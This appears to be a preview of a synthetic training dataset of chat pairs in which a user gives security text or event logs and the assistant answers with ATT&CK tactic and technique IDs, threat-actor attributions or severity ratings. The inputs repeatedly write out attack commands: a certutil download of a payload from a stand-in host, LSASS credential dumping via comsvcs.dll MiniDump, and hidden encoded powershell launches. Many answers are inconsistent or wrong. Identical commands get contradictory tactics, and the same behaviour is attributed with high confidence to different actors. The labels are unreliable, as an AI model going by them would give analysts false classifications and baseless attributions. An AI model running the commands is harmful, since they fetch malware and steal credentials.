messages
listlengths
2
2
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly constructed WMI Objects that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Prevent credential overlap across systems of administrator and privileged accounts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1047\", \"T1546.003\", \"T1546\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-U6OJVAW3BC)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Initial Access, Impact", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-TB614KA4HL)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Exfiltration, Collection", "role": "user" ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ryuk has enumerated files and folders on all mounted drives.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.106.160.142", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-D16KURUL19)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Persistence", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.166.94.76", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniq...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.184.65.124", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.3.247.92", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor logs for actions that could be taken to gather information about pods, including the use of discovery API calls by new or unexpected users.", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Use multi-factor authentication.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110.004\", \"T1110\", \"T1110.002\", \"T1110.001\", \"T1110.003\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-L49SW1CTCG)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Execution, Reconnaissance, Exfiltration", "role": "user" }, { "c...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2070 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-9IJWIRLNU4)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Credential Access, Exfiltration", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1579 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.159.235.109", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.2.92.173", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-9B3TXFFWKY)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Persistence, Reconnaissance", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.93.145.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"t...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-WQ5A0E6TNB)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence, Execution", "role": "user" }, { "cont...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1368 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.157.5.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0002\"], \"techniques\": [...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all st...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Such files often pose as email attachments and allow an adversary to gain Initial Access into a user’s system via Spearphishing Attachment then User Execution.", "role": "user" }, { "content": "{\"tactics...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-CR5CLW7ZII)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-EJVAKGGC9T)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Command and Control, Discovery", "role": "user" }, { "content...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Typically, a user is notified when someone else is trying to steal their session.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563.002\", \"T1563\"]}", "role": "a...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1516 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3305 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.124.241.152", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0010\", \"TA0001\"], \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ramsay can use Windows API functions such as WriteFile, CloseHandle, and GetCurrentHwProfile during its collection and file storage operations.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Duqu was an early example of malware that used steganography.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.003\", \"T1027\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CharmPower can enumerate drives and list the contents of the C: drive on a victim's computer.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.134.41.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.106.236.223", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0001\", \"TA0009\"], \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-A87AH459X1)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"E...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.115.179.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-WHI2J8UNRZ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: DarkComet can open an active screen of the victim’s machine and take control of the mouse and keyboard.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.001\", \"T102...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2793 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Figure 2: AuditCred/ROptimizer Service If successfully installed, this particular backdoor poses quite a threat to its target", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-XUQ5YDGITC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-21Z3XE1RVG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Impact, Persistence", "role": "user" }, { "content": "{...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.102.37.230", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2334 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-C7X2A0GISD)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severity...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2138 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.124.62.1", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.189.209.72", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0005\"], \"techni...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1081 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.88.90.198", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0008\"], \"techniques\": [\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FIN7 used the command prompt to launch commands on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1343 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"con...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \"T1559.002\"]}", "role": "assis...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.189.167.229", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0011\", \"TA000...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: UBoatRAT has used HTTP for C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-FHYZV2FH6J)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Discovery, Collection", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-2LJA6T2E1P)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-Q69F0OFBOG)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2304 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-P19VJE09CJ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"H...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-VDVZLP32M3)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Lateral Movement", "role": "user" }, { "content"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.136.76.38", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-01NH228UQ2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Lateral Movement", "role": "user" }, { "con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.15.200.45", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0009\", \"TA0043\"], \"techniques\": ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3642 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.27.17.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1098...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2901 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.81.52.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0001\"], \"t...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.139.104.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.182.102.2", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1385 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.45.122.162", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0040\"], \"techniques\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2662 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.54.239.37", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T105...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may buy, steal, or download software tools that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.002\"]}", "r...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.60.136.70", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0006\", \"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-JWHMMKZ0F3)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Command and Control", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-4OUVUNBGSR)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Hig...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-6Q0BF6E5FM)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.126.49.147", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.68.112.175", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 861 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.37.221.43", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0006\"], \"techniques\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4OLZHT1ZWK)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Exfiltration", "role": "user" }, { "content": "{\"seve...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.67.29.83", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files.", "role": "user" }, { "content": "{\"tacti...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-CIKUYR2I8O)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Reconnaissance", "role": "user" }, { "content"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This is now a deprecated mechanism in macOS in favor of Launchd.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037.004\", \"T1037\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-H9IIEULCSJ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Exfiltration, Defense Evasion", "role": "user" ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3313 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.53.35.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0005\"], \"t...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"],...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Some Daserf samples were signed with a stolen digital certificate.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "role": "assistant" } ]